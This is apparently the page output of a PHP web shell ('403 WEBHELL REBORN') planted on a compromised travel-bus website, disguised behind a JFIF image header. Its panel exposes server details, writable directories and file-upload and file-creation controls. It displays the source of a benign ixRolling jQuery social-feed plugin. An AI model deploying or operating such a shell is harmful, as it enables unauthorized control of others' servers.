ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/skin/latest/ixRolling/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/skin/latest/ixRolling/ixRolling.min.js
/*!
 * ixRolling - API Data rolling jQuery Plugin
 *
 * @version 1.2
 * @author eyesonlyz
 * @requires jquery >= 1.4.3
 * @license GPL
 * @homepage http://twing.kr/ixRolling
 * @twitter https://twitter.com/ix_rolling
 * @created 2011-09-25
 * @updated 2013-07-27
 *
 */
(function(c,e,g,a){c.extend(c.easing,{easeOutQuint:function(k,l,j,n,m){return n*((l=l/m-1)*l*l*l*l+1)+j},easeOutBounce:function(k,l,j,n,m){if((l/=m)<(1/2.75)){return n*(7.5625*l*l)+j}else{if(l<(2/2.75)){return n*(7.5625*(l-=(1.5/2.75))*l+0.75)+j}else{if(l<(2.5/2.75)){return n*(7.5625*(l-=(2.25/2.75))*l+0.9375)+j}else{return n*(7.5625*(l-=(2.625/2.75))*l+0.984375)+j}}}}});var i=!!Function.prototype.bind;var d=[];var h={};var b=60;var f={base:{tpl:'<div class="ixr-layout"><div class="ixr-header"><span class="ixr-sync-count"></span><button type="button" class="ixr-btn-sync"></button><button type="button" class="ixr-btn-up"></button><button type="button" class="ixr-btn-down"></button></div><div class="ixr-containers"><span class="ixr-btn-move ixr-btn-move-up"> &nbsp;&nbsp; </span><span class="ixr-btn-move ixr-btn-move-down"> &nbsp;&nbsp; </span><div class="ixr-container"><ul></ul></div><div class="ixr-footer"><span class="ixr-btn-extend">┛</span></div></div></div>',item_to_html:function(m){var k=m.target_str?' target="'+m.target_str+'"':"";var j='<li class="'+m.icon+'" value="'+m.timestamp+'"><div class="ixr-row">';if(this.options.thumbnail_size){j+='<span class="ixr-thumbnail ixr-thumbnail-'+this.options.thumbnail_size+'"><a href="'+m.link+'" '+k+' title="'+m.author.name+'" class="ixr-thumbnail">';if(this.options.thumbnail_size==="s"){j+='<span class="ixr-sns-icon ixr-sns-icon-'+m.icon+'">&nbsp;</span></a>'}else{j+='<img src="'+(m.img_url||"")+'" alt="'+m.author.name+'" onerror="try{this.src=\''+c.ixRolling.func.ixr_path+"/themes/images/noimg.gif'}catch(e){}\"/></a>";j+='<span class="ixr-sns-icon ixr-sns-icon-'+m.icon+'">&nbsp;</span>'}j+="</span>"}j+='<a class="ixr-author-name" '+k+' href="'+(m.author.link||"#")+'">'+m.author.name+"</a> - ";if(m.title&&m.title.length>1){j+='<span class="ixr-title">'+m.title+"</span>"}if(m.description){var l=m.description;if((m.icon==="facebook"||m.icon==="youtube")&&(this.options.msg_max_length>0&&l.length>this.options.msg_max_length)){l=l.substr(0,this.options.msg_max_length/2)+"..."}j+='<span class="ixr-description">'+l+"</span>"}if(this.options.show_row_menu&&m.row_menu){if(this.options.show_timer){m.row_menu.unshift('<span title="'+(m.date.toLocaleString()||"")+'"><var class="ixr-timer" title="'+m.timestamp+'">'+c.ixRolling.func.toTimer(m.timestamp)+"</var></span>")}j+='<em class="ixr-row-menu">';j+=m.row_menu.join(" · ");j+="</em>"}else{if(this.options.show_timer){j+='<span title="'+(m.date.toLocaleString()||"")+'"><var class="ixr-timer" title="'+m.timestamp+'">'+c.ixRolling.func.toTimer(m.timestamp)+"</var></span>"}}j+="</div></li>";return j}}};c.ixRolling=function(o,j,m){if(!(this instanceof c.ixRolling)){return new c.ixRolling(o,j,m)}if(typeof o!=="object"&&!o.jquery){o=c(o)}if(!o.jquery){c.error("elem wrong argument!")}if(o.length>1){o=c(o.get(0))}this.elem=c(o);this.uid=d.length;d[this.uid]=this;this.options=c.extend(true,{},c.ixRolling.defaultOptions,j||{});if(this.options.delay_sync<b){this.options.delay_sync=b}this.elem.addClass("ixr-widget");var n=c.ixRolling.func.ixr_path+"/themes/"+this.options.theme+".css";if(!(c('link[href="'+n+'"]')).length){var l=c('<link type="text/css" href="'+n+'" rel="stylesheet" />');c("head").append(l)}this._inited=false;this._services=[];this._slide_timeout=null;this._sync_timeout=null;this._sync_state="stop";this._items_buffer=[];this._sliding=false;this._hover=false;this.elem.addClass("ixr-"+this.options.theme);if(!this.options.height){this.options.height=this.elem.height()}c.extend(this,f[this.options.theme]||f.base);if(this.options.width){this.elem.width(this.options.width)}else{this.elem.width(this.options.width=this.elem.innerWidth())}if(this.options.height){this.elem.height(this.options.height)}this.layout=c(this.tpl).appendTo(this.elem);this.header=this.layout.find("div.ixr-header");this.btn_up=this.header.find("button.ixr-btn-up");this.btn_down=this.header.find("button.ixr-btn-down");this.btn_sync=this.header.find("button.ixr-btn-sync");if(!this.options.auto_sync){this.btn_sync.toggleClass("button.ixr-btn-sync","button.ixr-btn-sync-stop")}this.sync_count_span=this.header.find("span.ixr-sync-count");this.containers=this.layout.find("div.ixr-containers");this.btn_move_up=this.containers.find("span.ixr-btn-move-up");this.btn_move_down=this.containers.find("span.ixr-btn-move-down");this.container=this.containers.find("div.ixr-container");this.footer=this.layout.find("div.ixr-footer");this.btn_extend=this.footer.find("span.ixr-btn-extend");this.ul=this.container.find("ul");if(this.options.containers_border){this.containers.css("border",this.options.containers_border)}if(!this.options.show_header){this.header.hide()}else{this.btn_sync.bind("click",i?this.syncToggle.bind(this):c.proxy(this.syncToggle,this))}this.layout.height(this.elem.innerHeight());this.containers.height(this.elem.innerHeight()-(!this.options.show_header?0:this.header.outerHeight()));this.container.width(this.containers.innerWidth());this.containers.hide();if(this.options.use_slide_extend_btn){this.btn_extend.bind("click",i?this.toggleHeight.bind(this):c.proxy(this.toggleHeight,this))}else{this.btn_extend.hide()}this.btn_up.add(this.btn_move_up).click(i?this.slideUp.bind(this):c.proxy(this.slideUp,this));this.btn_down.add(this.btn_move_down).click(i?this.slideDown.bind(this):c.proxy(this.slideDown,this));this.containers.bind("mouseenter",i?this.hoverIn.bind(this):c.proxy(this.hoverIn,this));this.containers.bind("mouseleave",i?this.hoverOut.bind(this):c.proxy(this.hoverOut,this));this.elem.data("ixRolling",this.uid);if(m&&m instanceof Array){for(var k=0;k<m.length;++k){this.addService(m[k].service,m[k])}}};c.ixRolling.prototype={toggleHeight:function(){var k=this.containers.data("ixr-old-height");var j;if(!k){k=this.containers.height();this.containers.data("ixr-old-height",k);j=this.ul.height()-this.ul.find("li:first").height()-this.ul.find("li:last").height();this.containers.height(j)}else{this.containers.removeData("ixr-old-height");this.containers.height(k)}},showMoveBtn:function(){if(this._inited&&this.btn_move_up.is(":hidden")){this.btn_move_up.show();this.btn_move_down.show()}},hideMoveBtn:function(){if(this.btn_move_up.is(":visible")){this.btn_move_up.hide();this.btn_move_down.hide()}},addItem:function(j){},slide:function(j){if(!this._inited||this._sliding){return}this._sliding=true;var n=this.getSlideMode(j);var l=this.ul.find("li:first");var q=this.ul.find("li:last");var t,m="",r,s;var p=this;if(this._items_buffer.length>0){if(this._items_buffer.length===this.options.max_items){var o=c("<ul></ul>").appendTo(this.container);var k=this.ul.width();o.css("left",-k);o.width(k);while((s=this._items_buffer.shift())){m+=this.item_to_html(s)}o.append(m).css("top",-o.find("li:first").addClass("ixr-latest").height());this.sync_count_span.html(this._items_buffer.length);this.container.animate({left:"+="+k},this.options.duration,this.options.easing,function(){o.css({left:0});p.ul=o.replaceAll(p.ul);p.container.css({left:0});p._slideComplete(n,true)});return}else{if(n==="down"){if(l.hasClass("ixr-latest")){while(this._items_buffer.length>0){t=this._items_buffer.pop();if(t.timestamp>l.prop("value")){l.removeClass("ixr-latest");m=this.item_to_html(t);q.removeClass("ixr-latest");q.addClass("ixr-remove-li");q=c(m).appendTo(this.ul);q.addClass("ixr-latest").hide();break}}}}else{if(q.hasClass("ixr-latest")){t=this._items_buffer.pop();if(t.timestamp>q.prop("value")){q.removeClass("ixr-latest");m=this.item_to_html(t);l.addClass("ixr-remove-li");q=c(m).appendTo(this.ul);q.addClass("ixr-latest").hide()}}}this.sync_count_span.html(this._items_buffer.length)}}if(n==="down"){r="+="+l.height();this.ul.animate({top:r},this.options.duration,this.options.easing,function(){p._slideComplete("down")
})}else{if(n==="up"){l=l.next();r="-="+l.height();this.ul.animate({top:r},this.options.duration,this.options.easing,function(){p._slideComplete("up")})}}},hoverIn:function(){this._hover=true;if(this._inited){this.slideStop();this.showMoveBtn()}},hoverOut:function(){this._hover=false;if(this._inited){this.hideMoveBtn();this.slideStart(a,0.1)}},slideUp:function(){this.slide("up")},slideDown:function(){this.slide("down")},getSlideMode:function(j){if(j===a||(j!=="up"&&j!=="down")){j=this.options.slide_mode}return j},slideToggle:function(){if(!this._sliding){this.slideStop();this.options.slide_mode=this.options.slide_mode==="up"?"down":"up";this.slideStart(this.options.slide_mode,0)}},slideStart:function(k,j){if(!this._sliding){if(this.options.auto_slide&&!this._hover){if(j===a){j=this.options.delay_slide}this._slide_timeout=e.setTimeout(i?this.slide.bind(this):c.proxy(this.slide,this),j*1000)}}},slideStop:function(){if(this._slide_timeout){e.clearTimeout(this._slide_timeout);this._slide_timeout=null}},_slideComplete:function(j,k){if(!this._sliding){return}if(!k){var n=(j)?j:this.options.slide_mode;var m=this.ul.find("li:first");var l=this.ul.find("li:last");if(n==="down"){this.ul.css("top",-l.height());l.insertBefore(m);this.ul.find("li.ixr-remove-li").remove()}else{if(n==="up"){this.ul.css("top",-this.ul.find("li:first").next().height());m.insertAfter(l);this.ul.find("li.ixr-remove-li").remove()}}}this._sliding=false;this._updateTimer();this.slideStop();this.slideStart()},addService:function(k,j){if(h[k]){if(k==="twitter"||k==="facebook"){j._cache=true}this._services.push(c.extend(true,{},h[k],j||{}))}return this},init:function(){if(!this._inited&&this._services.length>0){this._sync_timeout=e.setTimeout(i?this.sync.bind(this):c.proxy(this.sync,this),700*(this.uid));if((/MSIE ((5\.5)|6)/.test(navigator.userAgent)&&navigator.platform==="Win32")){this.footer.css("background","transparent")}}},header:function(){},_updateTimer:function(){var l=this.ul.get(0).getElementsByTagName("var"),n=l.length,j=c.ixRolling.func.now(),k=c.ixRolling.func.toTimer,m=0;for(;m<n;m+=1){l[m].innerHTML=k(l[m].title,j)}},sync:function(){if(this._sync_state!=="stop"){this.syncStop();return}this.sync_count_span.addClass("ixr-sync-count-start");this._sync_state="start";var j=this;var l=0;var k=this._services.length;if(this._items_buffer.length>0){this._syncComplete(true)}else{c.each(this._services,function(o,s){c.support.cors=true;var n,r="";var m=s.ajax.dataType;var q=s.ajax.type;var p=(j.options.cache&&s._cache!==false)||(!j.options.cache&&s._cache);if(p){n=c.ixRolling.func.ixr_path+"/cache.php";m="json";q="GET";r={provider:{service:s.service,ajax:s.ajax,url:s.get_url(p),delay_sync:j.options.delay_sync,key:s.keyword||s.userid}}}else{n=s.get_url(p);r=s.ajax.data||{}}c.ajax({cache:false,url:n,type:q,data:r,async:true,timeout:10000,crossDomain:true,dataType:m,success:function(t){if(typeof t==="object"){j._items_buffer=j._items_buffer.concat(s.callback_data(t,j.options))}},error:function(t,u){},complete:function(){if(++l===k){j._syncComplete()}},statusCode:{400:function(){},404:function(){}}})})}},syncStop:function(){if(this._sync_state!=="stop"){this._syncTimerClear();this._sync_state="stop"}},syncToggle:function(){if(this.btn_sync.hasClass("ixr-btn-sync")){this.btn_sync.removeClass("ixr-btn-sync").addClass("ixr-btn-sync-stop");this.syncStop();this.sync_count_span.hide()}else{this.btn_sync.removeClass("ixr-btn-sync-stop").addClass("ixr-btn-sync");this.syncStart();this.sync_count_span.show()}},_syncTimerClear:function(){if(this._sync_timeout){e.clearTimeout(this._sync_timeout)}},syncStart:function(){this.syncStop();if(this._sync_state==="stop"){this.sync()}},_syncComplete:function(m){if(this._sync_state!=="start"){if(this._sync_timeout){e.clearTimeout(this._sync_timeout)}return}if(!m){this._items_buffer.sort(function(n,o){return parseInt((o.timestamp<n.timestamp)?-1:((o.timestamp>n.timestamp)?1:0),10)});if(this._items_buffer.length>this.options.max_items){this._items_buffer=this._items_buffer.slice(0,this.options.max_items)}if(!this._inited){if(this._items_buffer.length>0){this.containers.show();var k,j="";while((k=this._items_buffer.shift())){j+=this.item_to_html(k)}var l=c(j).appendTo(this.ul).first().addClass("ixr-latest");this.ul.css("top",-l.height());delete this._items_buffer;this._items_buffer=[];this._inited=true;this.layout.css("background","none");if(!this.options.auto_sync){this.syncToggle()}if(this.options.auto_slide){this.slideStart()}}}this.sync_count_span.html(this._items_buffer.length);this.sync_count_span.removeClass("ixr-sync-count-start")}this._sync_state="stop";if(this.options.auto_sync){this._sync_timeout=e.setTimeout(i?this.sync.bind(this):c.proxy(this.sync,this),this.options.delay_sync*1000)}},destroy:function(){this.syncStop();this.slideStop();this._items_buffer=[];this.layout.find("*").removeData().remove();this.layout.remove();this.elem.removeData("ixRolling");d[this.uid]=null}};c.fn.ixRolling=function(l,k){if(typeof l==="object"){l=c.extend({},c.fn.ixRolling.defaultOptions,l||{})}else{var j=arguments}return this.each(function(){var n;var o=c(this);n=o.data("ixRolling");if(n!==null&&n>-1){var m=d[n];if(typeof l==="string"&&typeof m[l]==="function"){m[l].apply(m,Array.prototype.slice.call(j,1))}else{c.error("Method "+l+" does not exist on ixRolling")}}else{var p=new c.ixRolling(o,l,k);if(k){p.init()}}})};c.ixRolling.defaultOptions={width:null,height:null,max_items:10,delay_sync:300,delay_slide:2.5,auto_slide:true,auto_sync:true,msg_max_length:140,thumbnail_size:"b",show_row_menu:true,show_timer:true,use_slide_extend_btn:true,show_header:false,slide_mode:"down",easing:"easeOutQuint",duration:700,cache:false,containers_border:null,theme:"base"};c.ixRolling.locale=(e.navigator.userLanguage||e.navigator.language||"en-US").split("-").shift();c.ixRolling.func={date:new Date(),tz_offset:(function(){var k=-(new Date()).getTimezoneOffset()/60*100;var m=4-String(k).length;var l="GMT+";for(var j=0;j<m;++j){l+="0"}l+=k;return l})(),strip_tag_regex:/<\S[^><]*>/g,regex_img:/<img.*?\ssrc=(?:(?:'([^']*)')|(?:"([^"]*)")|([^\s|>]*))/i,ixr_path:(function(){var j=e.document.getElementsByTagName("script");var k=j[j.length-1].src.split("?")[0].split("/").slice(0,-1).join("/");return k})(),now:function(){return parseInt((Date.now?Date.now():(+new Date()))/1000,10)},asTimestamp:function(j){return parseInt(j.getTime()/1000,10)},protocol:(function(){return"http"+(/^https/.test(g.location.protocol)?"s":"")})(),yql:function(l,k,j){if(j===a){j="feed"}return"http"+(/^https/.test(g.location.protocol)?"s":"")+"://query.yahooapis.com/v1/public/yql?format="+(k||"json")+"&q="+encodeURIComponent("select * from "+j+" where url='"+l+"'")},get_img_src:function(k){var j=String(k).match(this.regex_img);if(j&&j[3]){return j[3]}return""},iso8601fix:function(j){var k;if(j.indexOf("T")>9){k=new Date(Date.UTC(parseInt(j.substring(0,4),10),parseInt(j.substring(5,7),10)-1,parseInt(j.substring(8,10),10),parseInt(j.substring(11,13),10),parseInt(j.substring(14,16),10)))}else{if(j.indexOf("+")>-1){k=new Date(Date.parse(j.replace(/( \+)/," UTC$1")))}}return k},toDate:function(k){var j=new Date(k);if(isNaN(j.getTime())){j=c.ixRolling.func.iso8601fix(k)}return j},auto_link:(function(){var l=/(\b(https?|ftp|file):\/\/[-A-Z0-9+&@#\/%?=~_|!:,.;]*[-A-Z0-9+&@#\/%=~_|])/ig,k=/(^|\s)@(\w+)/g,j=/(^|\s)#(\w+)/g;return function(m){m=m.replace(l,'<a href="$1" target="_new">$1</a>');m=m.replace(k,'$1<a href="http://twitter.com/$2" target="_new">@$2</a>');m=m.replace(j,'$1<a href="http://twitter.com/search?q=%23$2" target="_new">#$2</a>');return m}})(),cut_text:function(k,j){return k.substr(0,j/2)+"..."},strip_tags:function(j){return j.replace(/(<([^>]+)>)/ig,"")},timer_locale_langs:{en:["seconds ago","minutes ago","hours ago","days ago","weeks ago","months ago","years ago"],ko:["초전","분전","시간전","일전","주일전","개월전","년전"]},toTimer:(function(){return function(m,k){var l=c.ixRolling.func.timer_locale_langs[c.ixRolling.locale]||c.ixRolling.func.timer_locale_langs.en;
if(!k){k=this.now()}var j=k-m;if(j<1){j=1}if(j>59){j=~~(j/60);if(j>59){j=~~(j/60);if(j>23){j=~~(j/24);if(j>=7&&j<29){return ~~(j/7)+l[4]}else{if(j>30){return ~~(j/30)+l[5]}else{return j+l[3]}}}else{return j+l[2]}}else{return j+l[1]}}else{return j+l[0]}}})()};c.ixRolling.ServiceImpl={_keyword:null,_img_url:null,_cache:null,ajax:{type:"GET",dataType:"jsonp",data:{}},userid:null,keyword:null,since_id:null,url:null,count:10,service:null,target_str:"_blank",get_url:function(j){return""},callback_data:function(j,k){return[]},row_menu:function(){return[]}};c.ixRolling.TemplateImpl={tpl:"",item_to_html:function(j){return""}};c.ixRolling.addService=function(j,k){k.service=j;h[j]=c.extend(true,{},c.ixRolling.ServiceImpl,k);return this};c.ixRolling.hasService=function(j){return h[j]?true:false};c.ixRolling.newService=function(j){return c.extend(true,{},h[j])};c.ixRolling.addTemplate=function(j,k){f[j]=c.extend(true,{},c.ixRolling.TemplateImpl,k)}})(jQuery,window,document);
/*!
 * Twitter service template for ixRolling
 *
 * @author eyesonlyz
 * @version 1.1
 *
 */
(function(c,b,a,d){c.ixRolling.addService("twitter",{userid:"CNN",get_url:function(f){var e;if(!this.keyword&&!this._keyword){e=this._url||("https://api.twitter.com/1.1/statuses/user_timeline.json?screen_name="+this.userid);e+="&count="+this.count}else{if(this._url){e=this._url}else{e="https://api.twitter.com/1.1/search/tweets.json?q=";e+=this._keyword?encodeURI(this._keyword):encodeURI(this.keyword);e+="&result_type=recent"}e+="&rpp="+this.count}if(!f&&this.since_id){e+="&since_id="+this.since_id}return e},callback_data:function(g,h){var f=[];var j;var e,k,i;if(this.userid&&!this.keyword){if(g.length>0){while((j=g.shift())){e=c.ixRolling.func.toDate(j.created_at);k=c.ixRolling.func.asTimestamp(e);if(this.last_timestamp&&this.last_timestamp>=k){break}f[f.length]={timestamp:k,service:this.service,date:e,icon:"twitter",description:c.ixRolling.func.auto_link(j.text),link:"http://twitter.com/"+this.userid+"/status/"+j.id_str,img_url:j.user.profile_image_url,author:{name:j.user.name,link:"http://twitter.com/"+this.userid+"/status/"+j.id_str},target_str:this.target_str,row_menu:h.show_row_menu?this.row_menu(j):"",others:{id_str:j.id_str}}}}}else{if(this.keyword){i=g.statuses||[];if(i.length>0){while((j=i.shift())){e=c.ixRolling.func.toDate(j.created_at);k=c.ixRolling.func.asTimestamp(e);if(this.last_timestamp>=k){break}f[f.length]={timestamp:k,date:e,service:this.service,icon:"twitter",target_str:this.target_str,title:"",link:"http://twitter.com/"+j.user.screen_name+"/status/"+j.id_str,description:c.ixRolling.func.auto_link(j.text),author:{name:j.user.name,link:"http://twitter.com/"+this.userid+"/status/"+j.id_str},img_url:j.user.profile_image_url,row_menu:this.row_menu(j),others:{id_str:j.id_str}}}}}}if(f.length>0){this.since_id=f[0].others.id_str;this.last_timestamp=f[0].timestamp}return f},row_menu:function(f){if(!f){return[]}var e=f.id_str;return['<a href="https://twitter.com/intent/tweet?in_reply_to='+e+'" target="_blank">reply</a>','<a href="https://twitter.com/intent/retweet?tweet_id='+e+'" target="_blank">retweet</a>','<a href="https://twitter.com/intent/favorite?tweet_id='+e+'" target="_blank">favorite</a>']}})})(jQuery,window,document);
/*!
 * Facebook service template for ixRolling
 *
 * @author eyesonlyz
 * @version 1.2
 *
 */
(function(c,b,a,d){c.ixRolling.addService("facebook",{userid:"143884685632131",get_url:function(f){var e;if(this.keyword){e="https://graph.facebook.com/search?type=post&date_format=U&limit="+this.count+"&q="+escape(this.keyword)}else{e="http://www.facebook.com/feeds/page.php?format=rss20&date_format=U&id="+this.userid}if(!f&&this.since_id){e+="&since="+this.since_id}if(this.keyword){return e}else{return c.ixRolling.func.yql(e)}},callback_data:function(h){var g=[],f,i,l,e;if(typeof h!=="object"){return g}var k;var j;if(this.keyword){if(h.data){k=h.data;while((j=k.shift())){l=Number(j.created_time);if(this.last_timestamp>=j.created_time){continue}f=new Date();f.setTime(Number(j.created_time+"000"));i="http://graph.facebook.com/"+j.from.id+"/picture";if(j.picture){i=j.picture}g[g.length]={service:this.service,icon:"facebook",timestamp:l,date:f,title:"",description:(j.message||j.description||"").replace(c.ixRolling.func.strip_tag_regex," "),link:j.link||"https://www.facebook.com/"+j.id,img_url:i,author:{id:j.from.id,name:j.from.name,link:"http://www.facebook.com/profile.php?id="+j.from.id},row_menu:this.row_menu(j)}}}}else{if(h.query&&h.query.results&&h.query.results.item){k=h.query.results.item;while((j=k.shift())){f=new Date(j.pubDate);l=c.ixRolling.func.asTimestamp(f);if(this.last_timestamp>=l){continue}e=j.description.replace(c.ixRolling.func.strip_tag_regex," ");g[g.length]={service:this.service,timestamp:l,date:f,icon:"facebook",link:j.link,author:{name:j.author||j.creator},title:j.title,description:e,img_url:"http://graph.facebook.com/"+this.userid+"/picture",row_menu:this.row_menu(j)}}}}if(g.length>0){this.since_id=g[0].timestamp;this.last_timestamp=g[0].timestamp}return g}})})(jQuery,window,document);
/*!
 * youtube service template for ixRolling
 *
 * @author eyesonlyz
 * @version 1.2
 *
 */
(function(a){a.ixRolling.addService("youtube",{userid:"youtube",get_url:function(){var b;if(this.keyword){b=this._url||"https://gdata.youtube.com/feeds/api/videos?q="+encodeURI(this.keyword)+"&v=2&";b+="alt=json-in-script&max-results="+this.count}else{b=this._url||"https://gdata.youtube.com/feeds/users/"+this.userid+"/uploads?alt=json-in-script&format=5"}return b},callback_data:function(e){var d=[],h,c,b;var g;var f;var i=a.ixRolling.func.protocol;if(!e||!e.feed||!e.feed.entry){return d}g=e.feed.entry||[];while((f=g.shift())){c=a.ixRolling.func.toDate(f.published.$t);h=a.ixRolling.func.asTimestamp(c);if(!c||this.last_timestamp>=h){continue}if(f.content){b=f.content.type==="text"?f.content.$t:f.content.$t?a.ixRolling.func.strip_tags(f.content.$t):""}else{b=""}d[d.length]={service:this.service,icon:"youtube",target_str:this.target_str,timestamp:h,date:c,title:f.title.$t,description:b,author:{name:f.author[0].name.$t,link:i+"://www.youtube.com/user/"+f.author[0].name.$t},link:f.link[0].href,img_url:f.media$group.media$thumbnail[1].url,row_menu:this.row_menu(f)}}if(d.length>0){this.since_id=d[0].timestamp;this.last_timestamp=d[0].timestamp}return d},row_menu:function(c){var f=a.ixRolling.func.protocol;var b,g;var e=[];if(this.keyword){g=c.id.$t.split(":").pop()}else{g=c.id.$t.split("/").pop();if(!g){if(c.id.$t){g=c.id.$t.split("/")[1]}else{return[]}}}var d=c.category[1];e[0]='<span title="'+d.label+'">'+d.term+"</span>";if(c.media$group.yt$duration){b=c.media$group.yt$duration.seconds;e.push("<span>Time ("+Math.floor(b/60)+":"+Math.ceil(b%60)+")</span>")}if(c.gd$comments&&c.gd$comments.gd$feedLink.countHint){e.push('<a href="'+f+"://www.youtube.com/all_comments?v="+g+'" target="_new">Comments('+c.gd$comments.gd$feedLink.countHint+")</a>")}return e}})})(jQuery);
/*!
 * Feed service template for ixRolling
 *
 * @author eyesonlyz
 * @version 1.0
 *
 */
(function(c,b,a,d){c.ixRolling.addService("feed",{get_url:function(f){var e=this.url;if(!f&&this.since_id){e+="&since="+this.since_id}return c.ixRolling.func.yql(e)},callback_data:function(o,s){var g=c.ixRolling.func;var m=[],k,n,i,t,q,h,j,r=g.cut_text,f=g.strip_tags;try{h=o.query.results.item||o.query.results.entry;if(h.shift===d){return m}}catch(l){return m}var p;if(o.query.results.item){while((p=h.shift())){t=c.ixRolling.func.toDate(p.pubDate||p.date);k=c.ixRolling.func.asTimestamp(t);if(!t||this.last_timestamp>=k){continue}n=r(f(p.subject||p.description||""),s.msg_max_length);m[m.length]={service:this.service,icon:"feed",timestamp:k,target_str:this.target_str,date:t,link:p.link,author:{name:p.author||p.creator||""},title:p.title,description:n,img_url:c.ixRolling.func.get_img_src(p.description)||this._img_url,row_menu:this.row_menu(p)}}}else{if(o.query.results.entry){while((p=h.shift())){if((q=p.published||p.updated)===d){continue}t=c.ixRolling.func.toDate(q);k=c.ixRolling.func.asTimestamp(t);if(!t||this.last_timestamp>=k){continue}n=i="";if(p.content){n=p.content.content}else{if(p.group){n=p.group.description.content}else{if(p.summary){n=p.summary!==p.title?p.summary:""}}}n=r(f(n),s.msg_max_length);if(p.link&&p.link.href){i=p.link.href}else{if(p.group.content.url){i=p.group.content.url}}j=(p.group||{}).thumbnail?p.group.thumbnail[0].url:this._img_url;m[m.length]={service:this.service,icon:"feed",timestamp:k,date:t,target_str:this.target_str,title:p.title,description:n,link:i,author:{name:p.author?p.author.name:""},img_url:j,row_menu:this.row_menu(p)}}}}if(m.length>0){this.since_id=m[0].timestamp;this.last_timestamp=m[0].timestamp}return m}})})(jQuery,window,document);
/*!
 * G4 service template for ixRolling
 *
 * @author eyesonlyz
 * @version 1.0
 *
 */
(function(a){a.ixRolling.addService("g4",{bo_table:null,target_str:"_parent",_cache:false,ajax:{dataType:"json",www:null},get_url:function(){if(this.bo_table){this.userid=this.bo_table}var b=a.ixRolling.func.ixr_path+"/g4.php?bo_table="+this.userid+"&count="+this.count;if(this.since_id){b+="&since_id="+this.since_id}return b},callback_data:function(d,e){var c=d.results||[];var g=c.length;var b=a.ixRolling.func.cut_text;for(var f=0;f<g;f++){c[f].service=this.service;c[f].description=b(c[f].description,e.msg_max_length);c[f].date=new Date(c[f].date);c[f].target_str=this.target_str}if(c[0]){this.since_id=c[0].others.wr_id;this.last_timestamp=c[0].timestamp}return c}})})(jQuery);
/*!
 * Yozm service template for ixRolling
 *
 * @author eyesonlyz
 * @version 1.1
 *
 */
(function(d,c,a,e){var b=d.ixRolling.func;d.ixRolling.addService("yozm",{keyword:"cnn",get_url:function(g){var f;if(!this._url){f="https://apis.daum.net/yozm/v1_0/search/timeline.json?q="+encodeURI(this.keyword)}else{f=this._url}f+="&count="+this.count;if(!g&&this.since_id){f+="&since_msg_id="+this.since_id}return f},callback_data:function(h){var g=[],k,l,f,i;var j;if(h.msg_list&&h.msg_list.shift!==e){k=h.msg_list;while((j=k.shift())){f=new Date(String(j.pub_date).replace("KST",""));l=b.asTimestamp(f);if(this.last_timestamp>=l){continue}i=j.user.profile_img_url;if(j.attachment&&j.attachment.thumbnail_url){i=j.attachment.thumbnail_url}g[g.length]={timestamp:l,service:this.service,icon:"yozm",target_str:this.target_str,date:f,title:"",link:j.permanent_url,description:j.plain_text||"",img_url:i,author:{name:j.user.nickname,link:j.permanent_url},picture:j.picture||"",msg_id:j.msg_id,row_menu:this.row_menu(j)}}if(typeof g[0]==="object"&&g.length>0){this.since_id=g[0].msg_id;this.last_timestamp=g[0].timestamp}}return g}})})(jQuery,window,document);
/*!
 * me2day service template for ixRolling
 *
 * @author eyesonlyz
 * @version 1.0
 *
 */
(function(c,b,a,d){c.ixRolling.addService("me2day",{userid:"ygonair",get_url:function(f){var e;if(this.keyword){e="http://me2day.net/search.json?query="+encodeURI(this.keyword)+"&count="+this.count;e+="&search_at=all";if(!f&&this.since_id){e+="&since_msg_id="+this.since_id}}else{e="http://me2day.net/api/get_posts/"+this.userid+".json";e+="?scope=all"}e+="&count="+this.count;return e},callback_data:function(g){var f=[],e,i;var h;if(this.userid&&g.shift!==d){while((h=g.shift())){e=c.ixRolling.func.toDate(h.pubDate);i=c.ixRolling.func.asTimestamp(e);if(this.last_timestamp>=i){continue}f.push({timestamp:i,service:this.service,icon:"me2day",target_str:this.target_str,date:e,title:"",description:h.textBody,author:{name:h.author.nickname},img_url:h.author.face,link:h.plink,row_menu:this.row_menu(h)})}}if(typeof f[0]==="object"&&f.length>0){this.last_timestamp=f[0].timestamp}return f}})})(jQuery,window,document);

Anon7 - 2021